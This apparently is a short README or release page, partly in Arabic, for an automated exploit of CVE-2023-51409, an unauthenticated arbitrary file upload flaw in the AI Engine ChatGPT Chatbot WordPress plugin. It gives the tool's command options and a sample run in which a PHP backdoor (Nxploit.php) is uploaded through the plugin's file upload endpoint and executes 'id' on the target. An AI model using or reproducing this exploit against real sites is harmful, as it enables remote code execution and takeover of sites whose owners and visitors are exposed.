
استغلال آلي لـ CVE-2023-51409، ثغرة رفع ملفات تعسفية بدون مصادقة في إضافة AI Engine ChatGPT Chatbot لـ WordPress، مما يتيح نشر باب خلفي PHP.
قد يسمح ذلك لمهاجم برفع أي نوع من الملفات إلى موقعك. ويمكن أن يشمل ذلك أبوابًا خلفية يتم تنفيذها بعد ذلك للوصول إلى موقعك.
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress instance.
-code PHP_CODE, --php_code PHP_CODE
PHP code to upload (default, id).
[INFO] Initiating version check for target.
[INFO] Target plugin version detected: 1.9.98
[VULNERABLE] Detected vulnerable plugin version. Proceeding with exploitation.
[INFO] Target is vulnerable. Proceeding with file upload.
[INFO] Attempting to upload file: Nxploit.php to endpoint: http://192.168.100.74:888/wordpress/wp-json/mwai-ui/v1/files/upload
[SUCCESS] File uploaded successfully! Accessible at: http://192.168.100.74:888/wordpress/wp-content/uploads/2025/01/Nxploit.php
[INFO] Exploitation complete. Uploaded file URL: http://192.168.100.74:888/wordpress/wp-content/uploads/2025/01/Nxploit.php
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)